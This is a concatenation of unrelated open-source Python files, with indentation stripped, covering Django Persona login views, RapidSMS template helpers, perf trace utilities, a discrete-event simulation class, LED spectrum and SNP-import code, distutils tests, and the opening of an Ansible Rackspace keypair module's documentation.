def persona_csrf(request):
"""Fetch a CSRF token for the frontend JavaScript."""
# Bluntly stolen from django-browserid
# Different CSRF libraries (namely session_csrf) store the CSRF
# token in different places. The only way to retrieve the token
# that works with both the built-in CSRF and session_csrf is to
# pull it from the template context processors via
# RequestContext.
context = RequestContext(request)
# csrf_token might be a lazy value that triggers side-effects,
# so we need to force it to a string.
csrf_token = unicode(context.get('csrf_token', ''))
return HttpResponse(csrf_token)
@require_POST
def persona_login(request):
"""
This is a view to work around an optimization in the Zeus load balancer
that doesn't allow creating session cookies on the frontpage.
We stash the Persona assertion in the session, which triggers setting
the session cookie. We then redirect to the real Persona login
view called "persona_complete" to complete the Persona steps.
"""
# REDFLAG FIXME TODO GODDAMNIT
request.session['sociallogin_assertion'] = request.POST.get('assertion', '')
querystring = QueryDict('', mutable=True)
for param in ('next', 'process'):
querystring[param] = request.POST.get(param, '')
return redirect('%s?%s' % (reverse('persona_complete'),
querystring.urlencode('/')))
def persona_complete(request):
assertion = request.session.pop('sociallogin_assertion', '')
provider_settings = app_settings.PROVIDERS.get(PersonaProvider.id, {})
audience = provider_settings.get('AUDIENCE', None)
if audience is None:
raise ImproperlyConfigured("No Persona audience configured. Please "
"add an AUDIENCE item to the "
"SOCIALACCOUNT_PROVIDERS['persona'] setting.")
resp = requests.post(settings.PERSONA_VERIFIER_URL,
{'assertion': assertion,
'audience': audience})
try:
resp.raise_for_status()
extra_data = resp.json()
if extra_data['status'] != 'okay':
return render_authentication_error(
request,
provider_id=PersonaProvider.id,
extra_context={'response': extra_data})
except (ValueError, requests.RequestException) as e:
return render_authentication_error(
request,
provider_id=PersonaProvider.id,
exception=e)
login = providers.registry \
.by_id(PersonaProvider.id) \
.sociallogin_from_response(request, extra_data)
login.state = SocialLogin.state_from_request(request)
return complete_social_login(request, login)
|
mpl-2.0
|
ewheeler/rapidsms-core
|
lib/rapidsms/webui/utils.py
|
2
|
9801
|
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
import sys
import copy
import os, re, traceback
from rapidsms.webui import settings
from django.template import RequestContext
from django.shortcuts import render_to_response as django_r_to_r
from django.core.paginator import Paginator, EmptyPage, InvalidPage
def render_to_response(req, template_name, dictionary=None, **kwargs):
"""Proxies calls to django.shortcuts.render_to_response, to avoid having
to include the global variables in every request. This is a giant hack,
and there's probably a much better solution."""
rs_dict = {
"apps": settings.RAPIDSMS_APPS.values(),
"debug": settings.DEBUG,
"javascripts": []
}
def __js_dir(fs_path, web_prefix):
"""Adds all of the .js files in a given directory to the javascripts array,
to be included in the <head>. Also checks for a single js file with the
same name as the directory. (dir_name/*.js and dir_name.js)"""
if os.path.exists(fs_path):
rs_dict["javascripts"].extend([
"%s/%s" % (web_prefix, fn)
for fn in os.listdir(fs_path)
if fn[-3:] == ".js"])
if os.path.exists("%s.js" % (fs_path)):
rs_dict["javascripts"].append(
"%s.js" % (web_prefix))
# add all of the global javascript files for all running
# apps. this is super handy for packaging functionality
# which affects the whole webui without hard-coding it
for app in rs_dict["apps"]:
__js_dir(
"%s/static/javascripts/global" % app["path"],
"/static/%s/javascripts/global" % app["type"])
# A NEW KIND OF LUNACY: inspect the stack to find out
# which rapidsms app this function is being called from
# --
# TODO: we're assuming that this function was called
# directly from the view, and looking for it at -2 in
# the stack. this could be wrong, if something else is
# further abstracting the call (which sounds fun).
tb = traceback.extract_stack(limit=2)
sep = os.sep
if sep == '\\':
# if windows, the file separator itself needs to be
# escaped again
sep = "\\\\"
m = re.match(r'^.+%s(.+?)%sviews\.py$' % (sep, sep), tb[-2][0])
if m is not None:
app_type = m.group(1)
# since we're fetching the app conf, add it to the
# template dict. it wouldn't be a very good idea to
# use it, but sometimes, when time is short...
rs_dict["app_conf"] = settings.RAPIDSMS_APPS[app_type]
# note which app this func was called from, so the tmpl
# can mark the tab (or some other type of nav) as active
rs_dict["active_app"] = rs_dict["app_conf"]["type"]
# also note which "view" (function) this func was called
# from, for a little introspection later in the rendering
# process (the view name is added to the css class
# of <body> to make per-view styling free)
rs_dict["active_view"] = tb[-2][2]
# find all of the javascript assets for
# this app, and add them to the <head>
__js_dir(
"%s/static/javascripts/app" % rs_dict["app_conf"]["path"],
"/static/%s/javascripts/app" % rs_dict["app_conf"]["type"])
# check for a view-specific javascript,
# to add LAST, after the dependencies
__js_dir(
"%s/static/javascripts/page/%s" % (rs_dict["app_conf"]["path"], rs_dict["active_view"]),
"/static/%s/javascripts/page/%s.js" % (rs_dict["app_conf"]["type"], rs_dict["active_view"]))
# attempt to import the "__global" function from
# the views.py that this method was called from
try:
mod_str = "%s.views" % rs_dict["app_conf"]["module"]
module = __import__(mod_str, {}, {}, ["__global"])
except ImportError:
module = None  # views module is missing; skip the __global lookup below
# if the views have a __global function, call it with the
# request object, and add the output (a dictionary) to the
# rs_dict. note that the 'dictionary' argument to _this_
# method is merged AFTER this, overriding the global data.
# also note that we do this here, rather than in the try
# block above, to avoid masking exceptions raised within
if module and hasattr(module, "__global"):
global_data = module.__global(req)
rs_dict.update(global_data)
# allow the dict argument to
# be omitted without blowing up
if dictionary is not None:
rs_dict.update(dictionary)
# unless a context instance has been provided,
# default to RequestContext, to get all of
# the TEMPLATE_CONTEXT_PROCESSORS working
if "context_instance" not in kwargs:
kwargs["context_instance"] = RequestContext(req)
# add the template information to the dictionary,
# if necessary
if not "base_template" in rs_dict:
rs_dict["base_template"] = settings.BASE_TEMPLATE
# Let apps know whether i18n is on or off
if hasattr(settings,"RAPIDSMS_I18N"):
kwargs["context_instance"]["USE_I18N"] = True
# pass on the combined dicts to the original function
return django_r_to_r(template_name, rs_dict, **kwargs)
def paginated(req, query_set, per_page=20, prefix="", wrapper=None):
# since the behavior of this function depends on
# the GET parameters, if there is more than one
# paginated set per view, we'll need to prefix
# the parameters to differentiate them
prefix = ("%s-" % (prefix)) if prefix else ""
# the per_page argument to this function provides
# a default, but can be overridden per-request. no
# interface for this yet, so it's... an easter egg?
if (prefix + "per-page") in req.GET:
try:
per_page = int(req.GET[prefix+"per-page"])
# if it was provided, it must be valid. we don't
# want links containing extra useless junk like
# invalid GET parameters floating around
except ValueError:
raise ValueError("Invalid per-page parameter: %r" %
(req.GET[prefix + "per-page"]))
try:
page = int(req.GET.get(prefix+"page", "1"))
paginator = Paginator(query_set, per_page)
objects = paginator.page(page)
objects.page_count = paginator.num_pages
# have no mercy if the page parameter is not valid. there
# should be no links to an invalid page, so coercing it to
# assume "page=xyz" means "page=1" would just mask bugs
except (ValueError, EmptyPage, InvalidPage):
raise ValueError("Invalid Page: %r" %
(req.GET[prefix + "page"]))
# if a wrapper function was provided, call it for each
# object on the page, and replace the list with the result
if wrapper is not None:
objects.raw_object_list = objects.object_list
objects.object_list = map(wrapper, objects.object_list)
# attach the prefix (if provided; might be blank) to the
# objects, where it can be found by the {% paginator %} tag
objects.prefix = prefix
return objects
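# Editor's usage sketch (hypothetical names): inside a view, wrap a queryset
# and hand the result to the {% paginator %} tag. The "prefix" keeps several
# paginated sets on one page from clobbering each other's GET parameters, and
# "?msg-per-page=50" overrides per_page for that set only.
#
#   messages = paginated(req, Message.objects.all(), per_page=20, prefix="msg")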
def self_link(req, **kwargs):
new_kwargs = req.GET.copy()
# build a new querydict using the GET params from the
# current request, with those passed to this function
# overridden. we can't use QueryDict.update here, since
# it APPENDS, rather than REPLACING keys. i hate CGI :|
for k, v in kwargs.items():
new_kwargs[k] = v
# return the same path that we're currently
# viewing, with the updated query string
kwargs_enc = new_kwargs.urlencode()
return "%s?%s" % (req.path, kwargs_enc)
def dashboard(position, path, perm=None):
def fake_templatetag(f):
''' Adds a fake (rendered -- not curried) templatetag to dashboard's
templatetags and returns the original function unchanged so it
can be registered normally as a proper templatetag in its home app. '''
from django import template
register = template.get_library("webapp.templatetags.webapp-tags")
# add the rendered template to dashboard templatetags library
name = position
if perm is not None:
# add permission to the name so we'll have
# 'position_name-app.perm_name'
name = name + '-' + perm
try:
# add the rendered template to dashboard's library of tags
register.tags.update({ name : massaman(f, path) })
except Exception,e:
# if something goes wrong, pass the error along to the dashboard
register.tags.update({ name : "Error loading %s. %s" % (f.func_name, e) })
return f
def massaman(function, file_name):
''' Returns a rendered template from the output of a function and
a template file (for making fake templatetags).
Code is poached from the InclusionNode class in __init__.py
of django.template '''
from django.template.loader import get_template, select_template
from django.template.context import Context
from django.utils.itercompat import is_iterable
if not isinstance(file_name, basestring) and is_iterable(file_name):
t = select_template(file_name)
else:
t = get_template(file_name)
nodelist = t.nodelist
# make a context object from the output of the function
# and return the rendered template with this context -- which is
# the resulting dict returned by the function
# TODO autoescape context
return nodelist.render(Context(function()))
return fake_templatetag
|
lgpl-3.0
|
sudosurootdev/kernel_staging
|
tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/Util.py
|
12527
|
1935
|
# Util.py - Python extension for perf script, miscellaneous utility code
#
# Copyright (C) 2010 by Tom Zanussi <[email protected]>
#
# This software may be distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import errno, os
FUTEX_WAIT = 0
FUTEX_WAKE = 1
FUTEX_PRIVATE_FLAG = 128
FUTEX_CLOCK_REALTIME = 256
FUTEX_CMD_MASK = ~(FUTEX_PRIVATE_FLAG | FUTEX_CLOCK_REALTIME)
NSECS_PER_SEC = 1000000000
def avg(total, n):
return total / n
def nsecs(secs, nsecs):
return secs * NSECS_PER_SEC + nsecs
def nsecs_secs(nsecs):
return nsecs / NSECS_PER_SEC
def nsecs_nsecs(nsecs):
return nsecs % NSECS_PER_SEC
def nsecs_str(nsecs):
str = "%5u.%09u" % (nsecs_secs(nsecs), nsecs_nsecs(nsecs)),
return str
def add_stats(dict, key, value):
if not dict.has_key(key):
dict[key] = (value, value, value, 1)
else:
min, max, avg, count = dict[key]
if value < min:
min = value
if value > max:
max = value
avg = (avg + value) / 2
dict[key] = (min, max, avg, count + 1)
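# Editor's example (not from the original file): accumulating running
# min/max/avg statistics keyed by name.
#
#   stats = {}
#   add_stats(stats, "read", 120)
#   add_stats(stats, "read", 80)   # stats["read"] -> (80, 120, 100, 2)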
def clear_term():
print("\x1b[H\x1b[2J")
audit_package_warned = False
try:
import audit
machine_to_id = {
'x86_64': audit.MACH_86_64,
'alpha' : audit.MACH_ALPHA,
'ia64' : audit.MACH_IA64,
'ppc' : audit.MACH_PPC,
'ppc64' : audit.MACH_PPC64,
's390' : audit.MACH_S390,
's390x' : audit.MACH_S390X,
'i386' : audit.MACH_X86,
'i586' : audit.MACH_X86,
'i686' : audit.MACH_X86,
}
try:
machine_to_id['armeb'] = audit.MACH_ARMEB
except:
pass
machine_id = machine_to_id[os.uname()[4]]
except:
if not audit_package_warned:
audit_package_warned = True
print "Install the audit-libs-python package to get syscall names"
def syscall_name(id):
try:
return audit.audit_syscall_to_name(id, machine_id)
except:
return str(id)
def strerror(nr):
try:
return errno.errorcode[abs(nr)]
except:
return "Unknown %d errno" % nr
|
gpl-2.0
|
irwinsnet/DesPy
|
despy/fel/event.py
|
1
|
9768
|
# Despy: A discrete event simulation framework for Python
# Version 0.1
# Released under the MIT License (MIT)
# Copyright (c) 2015, Stacy Irwin
"""
****************
despy.model.event
****************
.. autosummary::
Event
.. todo
Refactor event so it no longer inherits from Component.
Add remove_trace_field method.
Consider getting rid of trace_record history.
Use custom event CB object that receives event class as argument.
"""
import types
from collections import OrderedDict
from despy.model.component import Component
from despy.output.trace import TraceRecord
EARLY = -1
STANDARD = 0
LATE = 1
class Priority():
"""Define priorities for ordering events scheduled at the same time.
**Priority Levels**
The Priority class defines three constants that are used to
prioritize events that are scheduled to occur at the same time.
Events assigned a higher priority will occur before events that
are assigned lower priorities.
*Priority.STANDARD*
Despy uses Priority.STANDARD as the default priority when no
other priority is specified.
*Priority.EARLY*
Events assigned Priority.EARLY will be executed before
Priority.STANDARD and Priority.LATE events.
*Priority.LATE*
Events assigned Priority.LATE will be executed after
Priority.EARLY and Priority.STANDARD events.
Events scheduled to occur at the same time with the same
priority may be executed in any order.
The priority integer value is added to the scheduled event time.
Internally, Despy multiplies the scheduled time by 10. This
means that events scheduled to occur at time 1 are internally
scheduled for time 10, time 12 events would occur at internal
time 120, etc. This scheduling mechanism allows priorities as
high as 4 and as low as -4. A model that requires more than
three different priorities probably needs to be redesigned,
therefore, Despy only provides named constants for priorities
from -1 to 1.
"""
EARLY = -1
STANDARD = 0
LATE = 1
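# Editor's illustration of the scheduling arithmetic described in the Priority
# docstring (assuming the internal x10 time scale it mentions): an event
# scheduled at time 12 with Priority.EARLY sorts at internal time
# 12 * 10 + (-1) = 119, ahead of a STANDARD event at 120 and a LATE event
# at 121.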
class Event(Component):
""" A base class for all events.
Create an event by inheriting from the Event class. Subclasses of
Event must implement one or more of the doPriorEvent(),
do_event(), or doPostEvent() methods. The Simulation will execute
these methods when the Event time occurs and the Event object is
removed from the FEL.
**Inherited Classes**
* :class:`despy.model.component.Component`
**Members**
.. autosummary::
trace_fields
trace_records
append_callback
add_trace_field
do_event
dp_update_trace_record
_reset
__lt__
__gt__
"""
def __init__(self, name, trace_fields = None):
"""Initialize the Event object.
*Arguments*
``model`` (:class:`despy.model.model.Model`):
The Model that the event belongs to.
``name`` (string):
A short string describing the event. The name will be
printed in the event trace report.
``trace_fields`` (collections.OrderedDict)
An ordered dictionary of fields that will be added to the
trace record for this event.
"""
super().__init__(name)
self.description = "Event"
self._callbacks = []
self._trace_fields = OrderedDict()
if trace_fields is not None:
for key, value in trace_fields.items():
self.trace_fields[key] = value
self._trace_records = []
@property
def trace_fields(self):
"""An ordered dictionary containing custom trace data.
*Returns:* An instance of ``OrderedDict`` with custom trace data
stored as key: value pairs.
"""
return self._trace_fields
@property
def trace_records(self):
"""A list of trace records for completed events.
A single event object can be reused by rescheduling it on the
FEL. The ``trace_records`` attribute is a list of all
trace records that have been completed for the ``Event`` object.
*Returns:* A list of :class:`despy.output.trace.TraceRecord`
objects.
"""
return self._trace_records
def append_callback(self, callback):
"""Appends a function to the event's callback list.
The function will be called when the event is removed from the
FEL and executed.
*Arguments*
callback (function):
A variable that represents a class method or function.
"""
if isinstance(callback, types.FunctionType) or isinstance(callback,
types.MethodType):
self._callbacks.append(callback)
else:
raise TypeError("Object passed to Event.append_callback() was a "
"{} object. Nust be a function or method "
"object.".format(callback.__class__))
def add_trace_field(self, key, value):
"""Add custom fields to the event's trace record.
This method is typically called from an event's callback method.
It adds ``value`` to the event's trace record, labeled with the
text in ``key``.
*Arguments*
``key`` (String)
A text label that describes the data in ``value``.
``value`` (String or Number)
A number, string, or other text-convertible value.
"""
self.trace_fields[key] = value
def add_message(self, message, fields):
msg_record = TraceRecord(self.sim.rep, self.sim.now,
self.sim.pri, "Msg", message)
if fields is not None:
msg_record.add_fields(fields)
self.trace_records.append(msg_record)
def dp_do_event(self):
"""Executes an event's callback functions.
Internal Method. The ``dp_do_event`` method is called by the ``Simulation``
class's ``step()`` method. It is not intended to be called by the
user.
*Returns:* ``True`` if a callback method is executed. ``None`` if
there are no callbacks attached to the event.
"""
# Event record will precede any messages created in do_event().
evt_record = TraceRecord(self.sim.rep, self.sim.now,
self.sim.pri, "Event", self.name)
self.trace_records.append(evt_record)
self.do_event()
for callback in self._callbacks:
if isinstance(callback, types.FunctionType):
callback(self)
if isinstance(callback, types.MethodType):
callback()
# Modify record with info generated during event.
self.trace_records[0] = self.dp_update_trace_record(evt_record)
self.sim.results.trace.add(self.trace_records)
# Clean up in case event is re-used.
self.trace_records.clear()
def do_event(self):
pass
def dp_update_trace_record(self, trace_record):
"""Updates a trace record with custom fields.
Internal Method. The ``dp_update_trace_record`` method is called
by the ``trace`` object. It is not intended to be called by the
user.
*Arguments*
``trace_record``
A :class:`despy.output.trace.TraceRecord` object. The
TraceRecord will be added to the simulation's trace
report to record the occurrence of the event.
*Returns:* A Python list containing the updated trace record.
"""
trace_record = self.update_trace_record(trace_record)
if self.trace_fields is not None:
for key, value in self.trace_fields.items():
trace_record[key] = value
return trace_record
def update_trace_record(self, trace_record):
return trace_record
def __lt__(self, y):
"""Defines how ``Event`` objects respond to less-than operator.
The Python magic methods ``__lt__`` and ``__gt__`` are necessary
because the FEL is implemented as a heap. All items on a heap
must be sortable. Events are primarily sorted by simulation time.
For events that are scheduled to occur at the same time, this
method provides a secondary sort order based on the ``Event``
object's ``id`` attribute.
*Arguments*
``y``
The other ``Event`` object that is being compared with
the less-than operator.
*Returns:* ``True`` if ``self.id < y.id``, ``False`` otherwise.
"""
return self.id < y.id
def __gt__(self, y):
"""Defines how ``Event`` objects respond to '>' operator.
See documentation for ``__lt__`` for an explanation of why this
Python magic method is necessary.
*Arguments*
``y``
The other ``Event`` object that is being compared with
the greater-than operator.
*Returns:* ``True`` if ``self.id > y.id``, ``False`` otherwise.
"""
return self.id > y.id
|
mit
|
ollitapa/VTT-Raytracer
|
python_source/pyraytracer/spectrumTools.py
|
1
|
1572
|
#
# Copyright 2015 VTT Technical Research Center of Finland
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
from scipy.stats import norm
def generateLEDspectrum(domWave, fwhm, wavelengths, power=1.0, cut=True):
'''
Generate a gaussian-shaped LED spectrum.
If cut=True, all zero intensities are cut out.
'''
variance = fwhm / (2 * np.sqrt(2 * np.log(2)))  # actually the standard deviation: FWHM = 2*sqrt(2*ln 2)*sigma
rv = norm(loc=domWave, scale=variance)
intens = rv.pdf(wavelengths) * power
intens[intens < 1e-3] = 0
if cut:
truth = intens != 0
wavelengths = wavelengths[truth]
intens = intens[truth]
return(wavelengths, intens)
def generateAttennuationSpectrum(transmissivity, thickness):
'''
Function that generates attenuation coefficients of a Beer-Lambert medium.
transmissivity : array (or single number) of transmissivity [0,1] at
different wavelengths.
thickness : thickness of the sample at which the transmission was measured.
'''
att = -np.log(transmissivity) / thickness
return(att)
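if __name__ == '__main__':
    # Editor's sketch (assumes numpy/scipy are installed): a 450 nm LED with a
    # 20 nm FWHM sampled on a 1 nm grid, and the attenuation coefficient for
    # 90 % transmission through a 2 mm sample.
    wavelengths = np.arange(380.0, 781.0, 1.0)
    wl, intens = generateLEDspectrum(450.0, 20.0, wavelengths, power=1.0)
    att = generateAttennuationSpectrum(0.9, 2e-3)
    print(wl[0], wl[-1], intens.max(), att)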
|
apache-2.0
|
logan169/pyGeno
|
pyGeno/importation/SNPs.py
|
1
|
7001
|
import urllib, shutil
from ConfigParser import SafeConfigParser
import pyGeno.configuration as conf
from pyGeno.SNP import *
from pyGeno.tools.ProgressBar import ProgressBar
from pyGeno.tools.io import printf
from Genomes import _decompressPackage, _getFile
from pyGeno.tools.parsers.CasavaTools import SNPsTxtFile
from pyGeno.tools.parsers.VCFTools import VCFFile
from pyGeno.tools.parsers.CSVTools import CSVFile
def importSNPs(packageFile) :
"""The big wrapper, this function should detect the SNP type by the package manifest and then launch the corresponding function.
Here's an example of a SNP manifest file for Casava SNPs::
[package_infos]
description = Casava SNPs for testing purposes
maintainer = Tariq Daouda
maintainer_contact = tariq.daouda [at] umontreal
version = 1
[set_infos]
species = human
name = dummySRY
type = Agnostic
source = my place at IRIC
[snps]
filename = snps.txt # as with genomes you can either include the file at the root of the package or specify a URL from which it must be downloaded
"""
printf("Importing polymorphism set: %s... (This may take a while)" % packageFile)
packageDir = _decompressPackage(packageFile)
parser = SafeConfigParser()
parser.read(os.path.normpath(packageDir+'/manifest.ini'))
packageInfos = parser.items('package_infos')
setName = parser.get('set_infos', 'name')
typ = parser.get('set_infos', 'type')+'SNP'
species = parser.get('set_infos', 'species').lower()
genomeSource = parser.get('set_infos', 'source')
snpsFileTmp = parser.get('snps', 'filename').strip()
snpsFile = _getFile(parser.get('snps', 'filename'), packageDir)
try :
SMaster = SNPMaster(setName = setName)
except KeyError :
if typ.lower() == 'casavasnp' :
return _importSNPs_CasavaSNP(setName, species, genomeSource, snpsFile)
elif typ.lower() == 'dbsnpsnp' :
return _importSNPs_dbSNPSNP(setName, species, genomeSource, snpsFile)
elif typ.lower() == 'tophatsnp' :
return _importSNPs_TopHatSNP(setName, species, genomeSource, snpsFile)
elif typ.lower() == 'agnosticsnp' :
return _importSNPs_AgnosticSNP(setName, species, genomeSource, snpsFile)
else :
raise FutureWarning('Unknown SNP type in manifest %s' % typ)
else :
raise KeyError("There's already a SNP set by the name %s. Use deleteSNPs() to remove it first" %setName)
shutil.rmtree(packageDir)
def deleteSNPs(setName) :
"""deletes a set of polymorphisms"""
con = conf.db
try :
SMaster = SNPMaster(setName = setName)
con.beginTransaction()
SNPType = SMaster.SNPType
con.delete(SNPType, 'setName = ?', (setName,))
SMaster.delete()
con.endTransaction()
except KeyError :
raise KeyError("Can't delete the setName %s because i can't find it in SNPMaster, maybe there's not set by that name" % setName)
#~ printf("can't delete the setName %s because i can't find it in SNPMaster, maybe there's no set by that name" % setName)
return False
return True
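# Editor's usage sketch (hypothetical file/set names): importing a packaged
# polymorphism set and removing it again.
#
#   from pyGeno.importation.SNPs import importSNPs, deleteSNPs
#   importSNPs("dummySRY_snps.tar.gz")
#   deleteSNPs("dummySRY")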
def _importSNPs_AgnosticSNP(setName, species, genomeSource, snpsFile) :
"This function will also create an index on start->chromosomeNumber->setName. Warning : pyGeno wil interpret all positions as 0 based"
printf('importing SNP set %s for species %s...' % (setName, species))
snpData = CSVFile()
snpData.parse(snpsFile, separator = "\t")
AgnosticSNP.dropIndex(('start', 'chromosomeNumber', 'setName'))
conf.db.beginTransaction()
pBar = ProgressBar(len(snpData))
pLabel = ''
currChrNumber = None
for snpEntry in snpData :
tmpChr = snpEntry['chromosomeNumber']
if tmpChr != currChrNumber :
currChrNumber = tmpChr
pLabel = 'Chr %s...' % currChrNumber
snp = AgnosticSNP()
snp.species = species
snp.setName = setName
for f in snp.getFields() :
try :
setattr(snp, f, snpEntry[f])
except KeyError :
if f != 'species' and f != 'setName' :
printf("Warning filetype as no key %s", f)
snp.start = int(snp.start)
snp.end = int(snp.end)
snp.save()
pBar.update(label = pLabel)
pBar.close()
snpMaster = SNPMaster()
snpMaster.set(setName = setName, SNPType = 'AgnosticSNP', species = species)
snpMaster.save()
printf('saving...')
conf.db.endTransaction()
printf('creating indexes...')
AgnosticSNP.ensureGlobalIndex(('start', 'chromosomeNumber', 'setName'))
printf('importation of SNP set %s for species %s done.' %(setName, species))
return True
def _importSNPs_CasavaSNP(setName, species, genomeSource, snpsFile) :
"This function will also create an index on start->chromosomeNumber->setName. Warning : pyGeno positions are 0 based"
printf('importing SNP set %s for species %s...' % (setName, species))
snpData = SNPsTxtFile(snpsFile)
CasavaSNP.dropIndex(('start', 'chromosomeNumber', 'setName'))
conf.db.beginTransaction()
pBar = ProgressBar(len(snpData))
pLabel = ''
currChrNumber = None
for snpEntry in snpData :
tmpChr = snpEntry['chromosomeNumber']
if tmpChr != currChrNumber :
currChrNumber = tmpChr
pLabel = 'Chr %s...' % currChrNumber
snp = CasavaSNP()
snp.species = species
snp.setName = setName
for f in snp.getFields() :
try :
setattr(snp, f, snpEntry[f])
except KeyError :
if f != 'species' and f != 'setName' :
printf("Warning filetype as no key %s", f)
snp.start -= 1
snp.end -= 1
snp.save()
pBar.update(label = pLabel)
pBar.close()
snpMaster = SNPMaster()
snpMaster.set(setName = setName, SNPType = 'CasavaSNP', species = species)
snpMaster.save()
printf('saving...')
conf.db.endTransaction()
printf('creating indexes...')
CasavaSNP.ensureGlobalIndex(('start', 'chromosomeNumber', 'setName'))
printf('importation of SNP set %s for species %s done.' %(setName, species))
return True
def _importSNPs_dbSNPSNP(setName, species, genomeSource, snpsFile) :
"This function will also create an index on start->chromosomeNumber->setName. Warning : pyGeno positions are 0 based"
snpData = VCFFile(snpsFile, gziped = True, stream = True)
dbSNPSNP.dropIndex(('start', 'chromosomeNumber', 'setName'))
conf.db.beginTransaction()
pBar = ProgressBar()
pLabel = ''
for snpEntry in snpData :
pBar.update(label = 'Chr %s, %s...' % (snpEntry['#CHROM'], snpEntry['ID']))
snp = dbSNPSNP()
for f in snp.getFields() :
try :
setattr(snp, f, snpEntry[f])
except KeyError :
pass
snp.chromosomeNumber = snpEntry['#CHROM']
snp.species = species
snp.setName = setName
snp.start = snpEntry['POS']-1
snp.alt = snpEntry['ALT']
snp.ref = snpEntry['REF']
snp.end = snp.start+len(snp.alt)
snp.save()
pBar.close()
snpMaster = SNPMaster()
snpMaster.set(setName = setName, SNPType = 'dbSNPSNP', species = species)
snpMaster.save()
printf('saving...')
conf.db.endTransaction()
printf('creating indexes...')
dbSNPSNP.ensureGlobalIndex(('start', 'chromosomeNumber', 'setName'))
printf('importation of SNP set %s for species %s done.' %(setName, species))
return True
def _importSNPs_TopHatSNP(setName, species, genomeSource, snpsFile) :
raise FutureWarning('Not implemented yet')
|
apache-2.0
|
dreamsxin/kbengine
|
kbe/res/scripts/common/Lib/distutils/tests/test_cmd.py
|
118
|
3835
|
"""Tests for distutils.cmd."""
import unittest
import os
from test.support import captured_stdout, run_unittest
from distutils.cmd import Command
from distutils.dist import Distribution
from distutils.errors import DistutilsOptionError
from distutils import debug
class MyCmd(Command):
def initialize_options(self):
pass
class CommandTestCase(unittest.TestCase):
def setUp(self):
dist = Distribution()
self.cmd = MyCmd(dist)
def test_ensure_string_list(self):
cmd = self.cmd
cmd.not_string_list = ['one', 2, 'three']
cmd.yes_string_list = ['one', 'two', 'three']
cmd.not_string_list2 = object()
cmd.yes_string_list2 = 'ok'
cmd.ensure_string_list('yes_string_list')
cmd.ensure_string_list('yes_string_list2')
self.assertRaises(DistutilsOptionError,
cmd.ensure_string_list, 'not_string_list')
self.assertRaises(DistutilsOptionError,
cmd.ensure_string_list, 'not_string_list2')
cmd.option1 = 'ok,dok'
cmd.ensure_string_list('option1')
self.assertEqual(cmd.option1, ['ok', 'dok'])
cmd.option2 = ['xxx', 'www']
cmd.ensure_string_list('option2')
cmd.option3 = ['ok', 2]
self.assertRaises(DistutilsOptionError, cmd.ensure_string_list,
'option3')
def test_make_file(self):
cmd = self.cmd
# making sure it raises when infiles is not a string or a list/tuple
self.assertRaises(TypeError, cmd.make_file,
infiles=1, outfile='', func='func', args=())
# making sure execute gets called properly
def _execute(func, args, exec_msg, level):
self.assertEqual(exec_msg, 'generating out from in')
cmd.force = True
cmd.execute = _execute
cmd.make_file(infiles='in', outfile='out', func='func', args=())
def test_dump_options(self):
msgs = []
def _announce(msg, level):
msgs.append(msg)
cmd = self.cmd
cmd.announce = _announce
cmd.option1 = 1
cmd.option2 = 1
cmd.user_options = [('option1', '', ''), ('option2', '', '')]
cmd.dump_options()
wanted = ["command options for 'MyCmd':", ' option1 = 1',
' option2 = 1']
self.assertEqual(msgs, wanted)
def test_ensure_string(self):
cmd = self.cmd
cmd.option1 = 'ok'
cmd.ensure_string('option1')
cmd.option2 = None
cmd.ensure_string('option2', 'xxx')
self.assertTrue(hasattr(cmd, 'option2'))
cmd.option3 = 1
self.assertRaises(DistutilsOptionError, cmd.ensure_string, 'option3')
def test_ensure_filename(self):
cmd = self.cmd
cmd.option1 = __file__
cmd.ensure_filename('option1')
cmd.option2 = 'xxx'
self.assertRaises(DistutilsOptionError, cmd.ensure_filename, 'option2')
def test_ensure_dirname(self):
cmd = self.cmd
cmd.option1 = os.path.dirname(__file__) or os.curdir
cmd.ensure_dirname('option1')
cmd.option2 = 'xxx'
self.assertRaises(DistutilsOptionError, cmd.ensure_dirname, 'option2')
def test_debug_print(self):
cmd = self.cmd
with captured_stdout() as stdout:
cmd.debug_print('xxx')
stdout.seek(0)
self.assertEqual(stdout.read(), '')
debug.DEBUG = True
try:
with captured_stdout() as stdout:
cmd.debug_print('xxx')
stdout.seek(0)
self.assertEqual(stdout.read(), 'xxx\n')
finally:
debug.DEBUG = False
def test_suite():
return unittest.makeSuite(CommandTestCase)
if __name__ == '__main__':
run_unittest(test_suite())
|
lgpl-3.0
|
tersmitten/ansible-modules-core
|
cloud/rackspace/rax_keypair.py
|
157
|
4957
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# This is a DOCUMENTATION stub specific to this module, it extends
# a documentation fragment located in ansible.utils.module_docs_fragments
DOCUMENTATION = '''
---
module: rax_keypair
short_description: Create a keypair for use with Rackspace Cloud Servers
description:
- Create a keypair for use with Rackspace Cloud Servers
version_added: 1.5
options:
name:
description:
- Name of keypair
required: true
public_key:
description:
- Public Key string to upload. Can be a file path or string
default: null
state:
description:
- Indicate desired state of the resource
choices:
- present
- absent
default: present
author: "Matt Martz (@sivel)"
notes:
- Keypairs cannot be manipulated, only created and deleted. To "update" a
keypair you must first delete and then recreate.
- The ability to specify a file path for the public key was added in 1.7
extends_documentation_fragment: rackspace.openstack
'''
EXAMPLES = '''
- name: Create a keypair
hosts: localhost
gather_facts: False
tasks:
- name: keypair request
local_action:
module: rax_keypair
credentials: ~/.raxpub
name: my_keypair
region: DFW
register: keypair
- name: Create local public key
local_action:
module: copy
content: "{{ keypair.keypair.public_key }}"
dest: "{{ inventory_dir }}/{{ keypair.keypair.name }}.pub"
- name: Create local private key
local_action:
